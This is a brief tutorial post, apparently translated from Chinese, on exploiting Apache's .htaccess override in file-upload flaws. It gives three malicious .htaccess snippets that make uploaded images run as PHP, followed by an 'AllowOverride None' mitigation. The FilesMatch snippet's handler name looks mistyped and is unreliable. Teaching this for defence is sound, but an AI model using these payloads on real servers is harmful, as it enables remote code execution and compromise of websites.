【英文】Apache分布式配置文件漏洞利用

Posted on Edited on Views:

Preface

Exploiting Apache’s distributed configuration file .htaccess vulnerability for file upload vulnerabilities

This article is only for the purpose of learning network information defense

Distributed Configuration File

  • When the distributed configuration file .htaccess appears, it will override the httpd.conf global configuration file.

Attack

  • If file upload allows uploading the .htaccess file, it can force modification of the Apache server’s configuration.

Malicious Configuration

.htaccess
1
2
3
# Treat .png files as .php files
## Attack method: Upload a .png file with PHP code content
AddType application/x-httpd-php .png
1
2
3
# Treat files containing the PHP keyword as .php files
## Attack method: Upload an image file with the file name containing the PHP keyword <filename>.php.png
AddHandler php5-script php
1
2
3
4
5
# Match a specified file name and treat it as a .php file
## Attack method: Upload an image file with the specified file name <filename>.png
<FilesMatch "<filename>.png">
  SetHandler application/x-http-php
</FilesMatch>

Defense

  • Modify the AllowOverride in the Apache configuration file to None and disallow rewriting files in the Apache root directory.
1
AllowOverride None

Completion

References

Bilibili - Qianfeng Education Network Security College